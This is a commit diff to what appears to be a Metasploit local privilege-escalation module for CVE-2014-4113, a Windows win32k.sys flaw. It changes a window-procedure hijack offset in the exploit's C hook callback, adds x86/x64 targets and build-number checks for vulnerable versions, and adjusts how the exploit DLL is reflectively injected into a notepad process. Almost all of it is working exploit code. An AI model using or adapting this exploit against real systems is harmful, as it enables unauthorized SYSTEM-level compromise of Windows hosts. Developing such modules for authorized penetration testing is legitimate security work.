More robust check routine for cve-2014-4113
parent
5fa0403ac5
commit
46b1abac4a
|
@ -87,7 +87,7 @@ LRESULT CALLBACK HookCallback(int code, WPARAM wParam, LPARAM lParam) {
|
|||
HookCallbackClue = 1;
|
||||
if (UnhookWindowsHook(WH_CALLWNDPROC, HookCallback)) {
|
||||
#ifdef _M_X64
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 0x18), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongPtr(*(HWND *)(lParam + 24), GWLP_WNDPROC, (ULONG_PTR)HookCallbackTwo);
|
||||
#else
|
||||
lpPrevWndFunc = (WNDPROC)SetWindowLongA(*(HWND *)(lParam + 12), GWLP_WNDPROC, (LONG)HookCallbackTwo);
|
||||
#endif
|
||||
|
|
|
@ -48,17 +48,18 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
# * Windows 2003 SP2
|
||||
# * Windows 7 SP1
|
||||
# * Windows 2008
|
||||
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
|
||||
# Tested on (64 bits):
|
||||
# * Windows 2008 R2 SP1
|
||||
# * Windows 7 SP1
|
||||
[ 'Automatic', { } ],
|
||||
# * Windows 2008 R2 SP1
|
||||
[ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
|
||||
],
|
||||
'Payload' =>
|
||||
'Payload' =>
|
||||
{
|
||||
'Space' => 4096,
|
||||
'DisableNops' => true
|
||||
},
|
||||
'References' =>
|
||||
'References' =>
|
||||
[
|
||||
['CVE', '2014-4113'],
|
||||
['OSVDB', '113167'],
|
||||
|
@ -78,11 +79,28 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /(wow|x)64/i
|
||||
arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x86/i
|
||||
arch = ARCH_X86
|
||||
end
|
||||
|
||||
file_path = expand_path("%windir%") << "\\system32\\win32k.sys"
|
||||
major, minor, build, revision, branch = file_version(file_path)
|
||||
vprint_status("win32k.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
||||
|
||||
Exploit::CheckCode::Detected
|
||||
# Neither target suports Windows 8 or 8.1
|
||||
return Exploit::CheckCode::Safe if build == 9200
|
||||
return Exploit::CheckCode::Safe if build == 9600
|
||||
|
||||
if arch == ARCH_X86
|
||||
return Exploit::CheckCode::Vulnerable if [2600, 3790, 7600].include?(build)
|
||||
return Exploit::CheckCode::Vulnerable if revision <= 18577
|
||||
else
|
||||
return Exploit::CheckCode::Vulnerable if build == 7601 && revision <= 18577
|
||||
end
|
||||
|
||||
return Exploit::CheckCode::Unknown
|
||||
end
|
||||
|
||||
def exploit
|
||||
|
@ -90,11 +108,16 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
||||
end
|
||||
|
||||
target_arch = ARCH_X86
|
||||
if check != Exploit::CheckCode::Vulnerable
|
||||
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system.")
|
||||
end
|
||||
|
||||
if sysinfo["Architecture"] =~ /wow64/i
|
||||
fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
|
||||
elsif sysinfo["Architecture"] =~ /x64/
|
||||
target_arch = ARCH_X86_64
|
||||
elsif sysinfo["Architecture"] =~ /x64/ && target.arch.first == ARCH_X86
|
||||
fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
|
||||
elsif sysinfo["Architecture"] =~ /x86/ && target.arch.first == ARCH_X86_64
|
||||
fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
|
||||
end
|
||||
|
||||
print_status('Launching notepad to host the exploit...')
|
||||
|
@ -110,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
print_status("Reflectively injecting the exploit DLL into #{process.pid}...")
|
||||
if target_arch == ARCH_X86
|
||||
if target.arch.first == ARCH_X86
|
||||
dll_file_name = 'cve-2014-4113.x86.dll'
|
||||
else
|
||||
dll_file_name = 'cve-2014-4113.x64.dll'
|
||||
|
|
Loading…
Reference in New Issue